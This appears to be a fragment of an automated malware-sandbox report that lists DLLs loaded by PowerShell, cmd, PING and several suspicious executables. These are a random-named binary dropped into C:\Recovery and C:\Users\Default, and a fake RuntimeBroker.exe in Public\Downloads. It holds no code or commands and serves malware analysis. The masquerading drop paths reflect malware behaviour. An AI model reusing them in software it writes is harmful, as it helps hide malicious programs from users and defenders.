Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: apphelp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ktmw32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: uxtheme.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: propsys.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: edputil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: urlmon.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: iertutil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: srvcli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: netutils.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wintypes.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: appresolver.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: bcp47langs.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: slc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: userenv.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sppc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mpr.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: pcacli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sfc_os.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ktmw32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wbemcomn.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: amsi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: userenv.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: iphlpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dnsapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dhcpcsvc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winnsi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasapi32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasman.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rtutils.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mswsock.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winhttp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasadhlp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: fwpuclnt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: uxtheme.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winmm.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winmmbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mmdevapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: devobj.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ksuser.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: avrt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: audioses.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: powrprof.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: umpdc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: msacm32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: midimap.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dwrite.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: edputil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windowscodecs.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ntmarta.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: secur32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: schannel.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mskeyprotect.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ntasn1.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ncrypt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ncryptsslp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: msasn1.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
